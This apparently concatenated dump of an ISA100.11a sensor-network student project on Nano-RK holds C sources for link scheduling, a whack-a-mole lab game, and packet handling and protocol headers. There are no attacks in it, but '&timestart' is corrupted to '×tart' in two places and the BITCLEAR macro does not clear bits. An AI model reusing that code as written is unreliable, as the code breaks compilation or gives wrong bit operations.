addNeighbor(9,0,0,0,false,0,0,0);
addLink(26,0,0,4,0);//ad
addLink(4,1,0,1,0);
addLink(7,5,0,1,0);
addLink(8,6,0,1,0);
addLink(9,7,0,1,0);
addLink(10,8,0,1,0);
addLink(11,9,0,1,0);
addLink(12,0,0,8,0);//receive from 5
addLink(13,0,0,8,0);//6
addLink(14,0,0,8,0);//7
addLink(15,0,0,8,0);//8
addLink(16,0,0,8,0);//9
addLink(3,0,0,8,0);//1
addLink(25,0,0,8,0);
addLink(27,0,0,8,0);//Ad
/*addLink(17,0,0,4,0);//transmit ad
addLink(40,0,0,8,0);//receive ad
addLink(18,0,0,8,0);
addLink(19,0,0,8,0);
addLink(20,0,0,8,0);
addLink(21,0,0,8,0);
addLink(41,0,0,8,0);//receive from 1
addLink(42,1,0,1,0);//transmit to 1
addGraph(1,1,4,0,0);//graph
addLink(5,4,1,1,2);//transmit to 4
addLink(6,0,0,8,0);//receive from 4*/
//addLink(26,0,0,4,0);
/* addLink(7,5,0,1,0);
addLink(8,6,0,1,0);
addLink(9,7,0,1,0);
addLink(10,8,0,1,0);
addLink(11,9,0,1,0);
addLink(12,0,0,8,0);
addLink(13,0,0,8,0);
addLink(14,0,0,8,0);
addLink(15,0,0,8,0);
addLink(16,0,0,8,0);
addLink(3,0,0,8,0);
*/
//addGraph(1,3,5,3,4);
// addLink(2,1,1,1,0);//transmitting on slot 2
// addLink(10,1,1,8,0); //receiving on slot 10
// addLink(1,1,1,8,0);//receiving on slot 1
/*
configureSlot(2, 1, TX_NO_ADV, true,0,0,0,0,0,NEIGHBOR);
configureSlot(7,5,TX_NO_ADV,false,1,1,5,0,0,GRAPH_NEIGHBOR);
// configureSlot(5, 1, TX_NO_ADV, true,0,0,0,0,0, NEIGHBOR);
//configureSlot(2,3, RX, false,0,0,0,0,0, NEIGHBOR);
//configureSlot(7,10,ADV,false,0,0,0,0,0, NEIGHBOR);
//configureSlot(6,3, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(11,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(8,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(19,0,ADV,false,0,0,0,0,0,NEIGHBOR);
configureSlot(20,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(21,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(22,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(23,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(24,0, RX, false,0,0,0,0,0, NEIGHBOR);
*/
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot;
uint8_t *local_rx_buf;
uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//uint8_t tx[3]={2,15,16};
//uint8_t rx[3]={3,18,19};
//uint8_t my_tx_slot[4];
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
// isa_set_schedule(ISA_REPEATER, MY_CLK_SRC_ID);
// isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
printf("isa start!\n\r");
//i=0;
while(1){
//Spit out log info
if (txCount % 1000 == 0){
printf ("Tx: %d\r\nRX: %d\r\nPL:%d", txCount,rxCount, packetsLost);
}
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//local_rx_buf[PKT_DATA_START+length-2]='\0';
//printf("RX[%d]",slot);
/*for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);*/
//printf("\r\n");
//sprintf( &tx_buf[PKT_DATA_START],"Hello Mingzhe!");
//length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
//isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
/*
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
isa_tx_pkt(rx_buf,length,configDHDR(8),MY_TX_SLOT1);//change forward the message from recipient
*/
//printf(" Forward message is sent.\n\r");
//printf("pkt length:%d",length);
//printf("%d\r\n",cnt++);
// printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
// printf("\r\n");
}
// if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
// printf("Pending TX\r\n");
// }
// else{
/*sprintf( &tx_buf[PKT_DATA_START],local_rx_buf+PKT_DATA_START);
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
//isa_tx_pkt(rx_buf,length,configDHDR(),my_tx_slot[0]);//change forward the message from recipient
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();*/
if (cnt ==0 ){
MESSAGE *message;
message = &tx_buf[PKT_DATA_START];
message->type = DUMMY_PAYLOAD;
sprintf( &message->data,"2");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+2;
sendPacket(1,0, length, tx_buf, transmitCallback1);
//sendPacket(5,0, length, tx_buf, transmitCallback1);
//sendPacket(6, length, tx_buf, transmitCallback1);
cnt++;
}
/*sprintf( &tx_buf2[PKT_DATA_START],"Hello from slot 2!");
length=strlen(&tx_buf2[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf2,length,configDHDR(),2);
isa_wait_until_rx_or_tx ();*/
setMatrix();
nrk_wait_until_next_period();
// }
// nrk_terminate_task();
// isa_wait_until_rx_or_tx ();
// putchar('\n');
// putchar('\r');
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 10*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 20*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 50*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/lab2/master/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <rt_link.h>
#include <nrk_error.h>
//#include <sys/time.h>
// Change this to your group channel
#define MY_CHANNEL 13
#define MAX_MOLES 3 //for five nodes it should be 5
#define MY_TX_SLOT 0
#define MOLE_1_RX 2
#define MOLE_2_RX 4
#define MOLE_3_RX 6
#define MOLE_4_RX 8
#define MOLE_5_RX 10
#define ROUNDS 50
#define MOLE_INIT_STATUS 0x07 //for five nodes it should be 0x1f
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
rtl_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length;
uint8_t rssi,slot,oldMole,newMole=0,Rounds =0;
uint8_t pre_slot_detect = MOLE_INIT_STATUS;//used for recording previous slot status
uint8_t cur_slot_detect = MOLE_INIT_STATUS;//used for recording current slot status
uint8_t tmp = 0x01;
uint8_t mole_remove = 0;
uint8_t number_timeouts =0;
uint8_t number_moles = 0;
uint8_t user_limit_timeout = 0; //used for recording user's limited responding timeout
uint8_t *local_rx_buf;
uint16_t counter;
uint32_t Score = 0;
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
counter=0;
nrk_led_set(RED_LED);
rtl_init (RTL_COORDINATOR);
rtl_set_schedule( RTL_TX, MY_TX_SLOT, 1 );
// rtl_set_schedule( RTL_RX, MOLE_1_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_2_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_3_RX, 1 );
rtl_set_schedule( RTL_RX, MOLE_4_RX, 1 );
// rtl_set_schedule( RTL_RX, MOLE_5_RX, 1 );
rtl_set_channel(MY_CHANNEL);
rtl_start();
rtl_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!rtl_ready()) nrk_wait_until_next_period();
// Get the signal for UART RX
uart_rx_signal=nrk_uart_rx_signal_get();
// Register task to wait on signal
nrk_signal_register(uart_rx_signal);
// This shows you how to wait until a key is pressed to start
nrk_kprintf( PSTR("Press any key to start\r\n" ));
do{
if(nrk_uart_data_ready(NRK_DEFAULT_UART))
c=getchar();
else nrk_event_wait(SIG(uart_rx_signal));
nrk_time_get(×tart);
} while(c==-1);
c = -1;
//generate the first mole
newMole = rand()%MAX_MOLES;
//at the very beginning, master has to wait for nodes finishing scheduling their slots
j=0;
while(rtl_rx_pkt_check()==0){
printf("Waiting for connection, time %d \r\n",j++);
sprintf( &tx_buf[PKT_DATA_START],"Master count is S and new mole is S and Round = S");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
rtl_rx_pkt_release();
rtl_wait_until_rx_or_tx();
}
//record the timeout for timing out
nrk_time_get(&timeout);
//initial timeout interval
user_limit_timeout = 5;
printf("\r\nGame starts!");
while(finished==0){
//begin the game round
while(Rounds<=ROUNDS){
if( rtl_tx_pkt_check(MY_TX_SLOT)!=0 ){
//printf( "Pending on slot %d\r\n",MY_TX_SLOT );
}
else {
//printf("\r\nslot detect value:%d.\r\n",cur_slot_detect);
nrk_time_get(&timeend);
//game round continues
if (Rounds<=ROUNDS){
if(timeend.secs-timeout.secs > user_limit_timeout/*ROUNDS/2-Rounds/2*/){
//a round times out (extra credit)
nrk_time_get(&timeout);
oldMole = newMole;
if(cur_slot_detect==0x00){
while(oldMole==newMole)
newMole = rand()%MAX_MOLES;
}else{
if(cur_slot_detect==0x01)
mole_remove = 0;
else if(cur_slot_detect==0x02)
mole_remove = 1;
else if(cur_slot_detect==0x04)
mole_remove = 2;
else if(cur_slot_detect==0x08)
mole_remove = 3;
else if(cur_slot_detect==0x10)
mole_remove = 4;
while(oldMole==newMole||mole_remove==newMole)
newMole = rand()%MAX_MOLES;
}
cur_slot_detect = MOLE_INIT_STATUS;
Rounds++;
Score -= 10;
//printf("\nRounds = %d \nnumber_timeouts = %d \npresent time = %d\n", Rounds, number_timeouts, timeout.secs-timestart.secs);
printf("\r\nRound %d times out! Get a penalty of 10! Score is %d",Rounds,Score);
}
}
// if(pre_slot_detect!=cur_slot_detect)
// cur_slot_detect = MOLE_INIT_STATUS;
pre_slot_detect = cur_slot_detect;
cur_slot_detect = MOLE_INIT_STATUS;
// added the next mole to light up into the buffer
sprintf( &tx_buf[PKT_DATA_START],"Master count is %d and new mole is %d and Round = %d",counter,newMole,Rounds);
// PKT_DATA_START + length of string + 1 for null at end of string
//if(Rounds>=ROUNDS){
// Rounds++;
// sprintf( &tx_buf[PKT_DATA_START],"Master count is %d and new mole is %d and Round = %d",counter,6,Rounds);
//}
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
//printf( "\nTX on slot %d\r\n",MY_TX_SLOT);
//for(i=PKT_DATA_START;i<length;i++)
//printf("%c",tx_buf[i]);
nrk_led_toggle(BLUE_LED);
//printf("\n\n");
}
// Check for received packet
if( rtl_rx_pkt_check()!=0 ){
tmp = 0x01;
uint8_t mole_index,state;
local_rx_buf=rtl_rx_pkt_get(&length, &rssi, &slot);
//printf( "RX slot %d %d: ",slot,length );
//To detect if the node is turned off
//printf("\n\rtmp:%d");
tmp <<= (slot-2)/2;
cur_slot_detect &= ~tmp;
//buffer position 11 stores the value of the moleid from the slaves
//buffer position 19 stores the value of light
// '1' indicates mole whacked (light closed)
// '0' indicates mole not whacked yet (light open)
				if( ((local_rx_buf[11]-'0') == newMole) &&
					(local_rx_buf[19]=='1') &&
					(Rounds <= ROUNDS) ){
//printf("NEW MOLE:%d",newMole);
oldMole = newMole;
if(pre_slot_detect==0x00){
while(oldMole==newMole)
newMole = rand()%MAX_MOLES;
}else{
if(pre_slot_detect==0x01)
mole_remove = 0;
else if(pre_slot_detect==0x2)
mole_remove = 1;
else if(pre_slot_detect==0x04)
mole_remove = 2;
else if(pre_slot_detect==0x08)
mole_remove = 3;
else if(pre_slot_detect==0x10)
mole_remove = 4;
while(oldMole==newMole||mole_remove==newMole)
newMole = rand()%MAX_MOLES;
}
Rounds++;
user_limit_timeout -= 1;
if(user_limit_timeout<1)
user_limit_timeout = 1;
nrk_time_get(&timeend);
nrk_time_get(&timeout);
Score += 100;//timeend.secs-timestart.secs; //+ number_timeouts * 10;
//number_timeouts = 0;
printf("\r\n You got it. Round: %d, Score : %d",Rounds, Score);
//cur_slot_detect = MOLE_INIT_STATUS;
}
//printf( "\r\n" );
rtl_rx_pkt_release();
}
rtl_wait_until_rx_or_tx();
}//while(Rounds<=ROUNDS)
printf("\r\nDONE and Score = %d \r\n",Score);
// This shows you how to continue this game or not
printf("\r\ncontinue this game or not? (y/n)\r\n");
// Get the signal for UART RX
uart_rx_signal=nrk_uart_rx_signal_get();
// Register task to wait on signal
nrk_signal_register(uart_rx_signal);
//c = -1;
do{
if(nrk_uart_data_ready(NRK_DEFAULT_UART))
c=getchar();
else nrk_event_wait(SIG(uart_rx_signal));
nrk_time_get(×tart);
} while(c==-1);
if(c=='y'||c=='Y'){
c = -1;
newMole = 0;
pre_slot_detect = MOLE_INIT_STATUS;//used for recording previous slot status
cur_slot_detect = MOLE_INIT_STATUS;//used for recording current slot status
tmp = 0x01;
mole_remove = 0;
number_timeouts =0;
number_moles = 0;
Score = 0;
Rounds = 0;
//at the very beginning, master has to wait for nodes finishing scheduling their slots
j=0;
rtl_rx_pkt_release();
while(rtl_rx_pkt_check()==0){
printf("Waiting for nodes scheduling their slots, time %d \r\n",j++);
sprintf( &tx_buf[PKT_DATA_START],"Master count is S and new mole is S and Round = S");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
rtl_tx_pkt( tx_buf, length, MY_TX_SLOT);
rtl_rx_pkt_release();
rtl_wait_until_rx_or_tx();
}
}else if(c=='n'||c=='N'){
printf("Game ends");
nrk_terminate_task();
}
}//while(finished)
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 1;
TaskOne.period.nano_secs = 0;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 100*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/xmpp_pkt.h
#ifndef _XMPP_PKT_H
#define _XMPP_PKT_H
#include <sampl.h>
#define XMPP_PASSWD_START_OFFSET 5
#define XMPP_TIMEOUT_OFFSET 4
typedef struct xmpp_pkt
{
uint8_t passwd_size; // byte 0
uint8_t jid_size; // byte 1
uint8_t msg_size; // byte 2
uint8_t timeout; // byte 3
char *passwd; // byte 4
char *jid; // byte 4+passwd_size
char *msg; // byte 4+passwd_size+jid_size
} XMPP_PKT_T;
int8_t xmpp_generate( SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt);
uint8_t xmpp_pkt_pack( XMPP_PKT_T *p, uint8_t *buf, uint8_t index );
void xmpp_pkt_unpack( XMPP_PKT_T *p, uint8_t *buf, uint8_t index );
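/*
 * Wire-layout sketch implied by the field comments above: a 4-byte fixed
 * header of sizes and a timeout, followed by three back-to-back
 * variable-length strings, each sized by its *_size byte:
 *
 *   [0]=passwd_size [1]=jid_size [2]=msg_size [3]=timeout
 *   [4 ...]                       passwd (passwd_size bytes)
 *   [4+passwd_size ...]           jid    (jid_size bytes)
 *   [4+passwd_size+jid_size ...]  msg    (msg_size bytes)
 *
 * xmpp_pkt_pack()/xmpp_pkt_unpack() translate between this packed form
 * and the XMPP_PKT_T pointer view.
 */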
#endif
<file_sep>/ISA100.11a-master/README.md
ISA100.11a
==========
To build and run:
1. Download the entire folder either by forking or by taking a snapshot.
2. Go to ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/
3. Choose between the gateway and repeater folders as required. For a single topology, there needs to be only one gateway.
4. To build, type "make; make clean; make program" in a terminal inside the gateway/repeater folder.
5. For each repeater, replace repeater/main.c with the file matching the repeater ID you wish to use from Documentation/9 node config/.
6. To view the serial output, you may open a minicom window for each device connected.
Files: Project Report: ESE 519 ISA Final Report.pdf
API, Videos: https://github.com/ESE519/ISA100.11a/wiki
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/src/isa_backup/isa_scheduler.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
#include <isa.h>
#include <isa_scheduler.h>
#include <include.h>
#include <nrk_error.h>
/* For ISA */
/* This method is only for demo 1 and needs to be updated. */
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode, uint8_t clk_src_id)
{
char i =0;
isa_clk_src_id = clk_src_id;
if (isa_node_mode==ISA_REPEATER){
isa_tdma_rx_mask |= ((uint32_t) 1) << 5;
isa_tdma_rx_mask |= ((uint32_t) 1) << 3;
isa_tdma_tx_mask |= ((uint32_t) 1) << 2;
isa_sched[2] = 1;
isa_sched[3] = 1;
isa_sched[5] = 1;
}
else if(isa_node_mode==ISA_RECIPIENT){
//isa_tdma_rx_mask = 0xffff;
isa_tdma_rx_mask |= ((uint32_t) 1) << 2;
isa_tdma_tx_mask |= ((uint32_t) 1) << 5;
//for(i=0;i<25;i++)
isa_sched[2] = 1;
isa_sched[5] = 1;
}
/*printf("isa_scheduler.h, isa_set_schedule():\n\r");
for(i=0;i<25;i++)
printf("%d,",isa_sched[i]);
printf("\n\r");*/
return NRK_OK;
}
/**
* isa_get_schedule()
*
* This function returns the stored schedule for a particular slot.
*
* Return: schedule value
*/
int8_t isa_get_schedule (uint8_t slot)
{
if (slot >= ISA_SLOTS_PER_FRAME) // valid slot indices are 0..ISA_SLOTS_PER_FRAME-1
return NRK_ERROR;
return isa_sched[slot];
}
/**
* _isa_clear_sched_cache()
*
* This function is called by the timer interrupt at the
* start of each ISA cycle to remove any cached scheduling
* values. Only call this if you are reseting the ISA frames.
*/
void _isa_clear_sched_cache ()
{
uint8_t i;
// FIXME: compress this later...
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
}
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup. It uses an internal cache to allow for
* faster computation.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t wrapped_slot;
uint8_t current_local_slot;
//total_slot = (((uint16_t)current_frame)<<5) + current_slot;
min_slot = ISA_SLOTS_PER_FRAME + 1;
current_local_slot = current_global_slot % ISA_SLOTS_PER_FRAME;
//scheduled slot follows current slot
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
//printf("isa_sched[%d] is %d.\n\r",test_slot,isa_sched[test_slot]);
if(isa_sched[test_slot]==0) //slot is not scheduled
continue;
min_slot = test_slot-current_local_slot;
return min_slot;
}
// scheduled slot wrapped back
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_sched[test_slot]==0) //slot is not scheduled
continue;
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
// Nothing is scheduled in the entire frame: return the sentinel value so
// the caller can tell that no RX/TX wakeup is pending.
return min_slot;
}
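/*
 * Worked example (illustrative, assuming ISA_SLOTS_PER_FRAME is 25 as the
 * modulo above suggests, and the demo ISA_RECIPIENT schedule where slots 2
 * and 5 are set): from global slot 3 the next scheduled slot is 5, so the
 * function returns 2; from global slot 6 nothing later in the frame is
 * set, so it wraps and returns 25 - 6 + 2 = 21 slots until slot 2 of the
 * next frame.
 */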
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/SAMPL/client_core/generate.c
#include "generate.h"
#include <globals.h>
#include <nrk.h>
#include <bmac.h>
#include <sampl.h>
#include <ping_pkt.h>
#include <eeprom_data.h>
#include <ack_pkt.h>
#include <control_pkt.h>
#include <trace.h>
#include <stats_pkt.h>
#include <transducer_pkt.h>
/*
uint8_t upstream_reply_mac
This is the address of the node higher in the tree that sent
the packet. Typically this should be used as the destination
reply address.
*/
void create_upstream_data_packet (SAMPL_DOWNSTREAM_PKT_T * ds_pkt,
SAMPL_UPSTREAM_PKT_T * us_pkt,
uint8_t upstream_reply_mac)
{
uint8_t len,i,mode,num;
uint16_t addr;
// This function is responsible for creating the
// data that is sent back up the tree.
#ifdef DEBUG_TXT
nrk_kprintf (PSTR ("Composing reply\r\n"));
#endif
us_pkt->seq_num = ds_pkt->seq_num;
us_pkt->next_hop_dst_mac = upstream_reply_mac;
us_pkt->buf_len=US_PAYLOAD_START;
us_pkt->payload=&(us_pkt->buf[US_PAYLOAD_START]);
us_pkt->payload_len=0;
us_pkt->payload_start=US_PAYLOAD_START;
us_pkt->ctrl_flags = US_MASK;
if((ds_pkt->ctrl_flags & LINK_ACK) !=0 ) us_pkt->ctrl_flags |= LINK_ACK;
if((ds_pkt->ctrl_flags & ENCRYPT) !=0 ) us_pkt->ctrl_flags |= ENCRYPT;
us_pkt->ack_retry= ds_pkt->ack_retry;
us_pkt->subnet_mac[0] = my_subnet_mac[0];
us_pkt->subnet_mac[1] = my_subnet_mac[1];
us_pkt->subnet_mac[2] = my_subnet_mac[2];
us_pkt->priority = ds_pkt->priority;
us_pkt->error_code = 0;
us_pkt->num_msgs = 1;
if(admin_debug_flag==1 && (ds_pkt->ctrl_flags & DEBUG_FLAG) !=0 )
{
printf( "0x%x%x: ",my_subnet_mac[0],my_mac);
nrk_kprintf( PSTR(" ds_pkt ") );
if(ds_pkt->is_mac_selected==1)
nrk_kprintf( PSTR("selected\r\n") );
else
nrk_kprintf( PSTR("not selected\r\n") );
}
if(ds_pkt->is_mac_selected==1)
{
us_pkt->pkt_type = ds_pkt->pkt_type;
switch (ds_pkt->pkt_type) {
case PING_PKT:
ping_generate(us_pkt);
break;
case XMPP_PKT:
// just forward and send acks back
// mobile nodes will interpret the packets
xmpp_generate(us_pkt,ds_pkt);
break;
case CONTROL_PKT:
// Don't reply if packet is not encrypted
if((ds_pkt->ctrl_flags & ENCRYPT) == 0 ) return;
control_generate(us_pkt,ds_pkt);
break;
case STATS_PKT:
stats_generate(us_pkt,ds_pkt);
break;
case SUBNET_NEIGHBOR_LIST_PKT:
nlist_generate(us_pkt,ds_pkt);
break;
case TRACEROUTE_PKT:
trace_generate(us_pkt,ds_pkt);
break;
case ROUTE_PKT:
// Don't reply if packet is not encrypted
if((ds_pkt->ctrl_flags & ENCRYPT) == 0 ) return;
route_generate(us_pkt,ds_pkt);
break;
case DATA_STORAGE_PKT:
eeprom_storage_generate(us_pkt, ds_pkt);
break;
case TRANSDUCER_CMD_PKT:
transducer_generate(us_pkt, ds_pkt);
break;
default:
if(admin_debug_flag==1 && (ds_pkt->ctrl_flags & DEBUG_FLAG) !=0 )
{
printf ("Unknown %d, %d: ", ds_pkt->pkt_type, ds_pkt->payload_len);
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "%x ",ds_pkt->payload[i] );
printf( "\r\n" );
}
us_pkt->pkt_type = EMPTY_PKT;
us_pkt->num_msgs = 0;
}
}
else
{
// Fill in blank reply
us_pkt->pkt_type = EMPTY_PKT;
us_pkt->num_msgs = 0;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/dlmo.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef DLMO_H
#define DLMO_H
//********************************Configure max limits**********************************
#define DLMO_LINK_MAX_COUNT 10
#define DLMO_NEIGHBOR_MAX_COUNT 25
#define TRANSMIT_QUEUE_MAX_SIZE 10
//****************************************************************************************
#define ISA_SLOTS_PER_FRAME 25
#define ISA_MAX_SLOTS 63
//************************linkType field in DLMO_LINK******************************
#define TRANSMIT_BIT 0x80
#define RECEIVE_BIT 0x40
#define EXP_BACK_BIT 0x20
#define IDLE_BIT 0x10
#define DISCOVERY 0x0C
#define JOIN_RESPONSE 0x02
#define SELECTIVE 0x01
//Discovery
#define DISCOVERY_NONE 0
#define DISCOVERY_ADVERTISEMENT 1
#define DISCOVERY_BURST 2
#define DISCOVERY_SOLICITATION 3
//SELECTIVE
#define SELECTIVE_ALLOWED 1
#define SELECTIVE_NOT_ALLOWED 0
//enums for linkType
typedef enum {
JOIN_RESP,
TX_NO_ADV,
TX_RX_NO_ADV,
TX_ADV,
ADV,
BURST_ADV,
BURST_ADV_SCAN,
SOLICITATION,
RX
} LinkType;
//***********************************************************************************
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
DMXHR_INDEX=1,
DAUX_INDEX=5,
DROUT_INDEX=34,
DADDR_INDEX=37,
//SLOT_INDEX=6,
SLOT_INDEX=1,
SRC_INDEX=2,//change
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START=3
//PKT_DATA_START=42
} isa_pkt_field_t;
//**********************************************ISA_QUEUE***************************************************
typedef struct ISA_QUEUE ISA_QUEUE;
struct ISA_QUEUE
{
int8_t length;
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
bool transmitPending;
bool usedSlot;
void (*slot_callback)(ISA_QUEUE *);
uint8_t priority;
uint16_t neighbor;
nrk_time_t time;
} ;
//************************************dlmo.neighbor structure***************************************
//for typeInfo
# define CLOCK_NONE 0x00
# define CLOCK_SECONDARY 0x40
# define CLOCK_PREFERRED 0x80
# define CLOCK_RESERVED 0xC0
typedef struct {
bool isPresent;
uint16_t index;
uint64_t EUI64;
uint8_t groupCode1;
uint8_t groupCode2;
uint8_t typeInfo;// 7-6 ClockSource, 5-4 ExtGrCnt, DiagLevel 3-2, LinkBacklog 1,Reserved 0
uint8_t linkBacklogIndex;//
uint8_t linkBacklogDur;//
uint8_t linkBacklogActivate;
}DLMO_NEIGHBOR;
//MACROS for bit manipulation
#define BITSET(x,y) ((x) |= 1<<(y))
#define BITCLEAR(x,y) ((x) &= 1<<(y))
#define BITGET(x,y) ((x) & 1<<(y))
#define ISAMASK(x,y) ((x) & (y))
#define ISASET(x,y) ((x) | (y))
// ********************************* dlmo.link structure *******************************
typedef struct {
bool isPresent;
uint16_t index;
uint8_t superframeIndex;
uint8_t linkType;
uint8_t template1;
uint8_t template2;
uint8_t typeInfo;
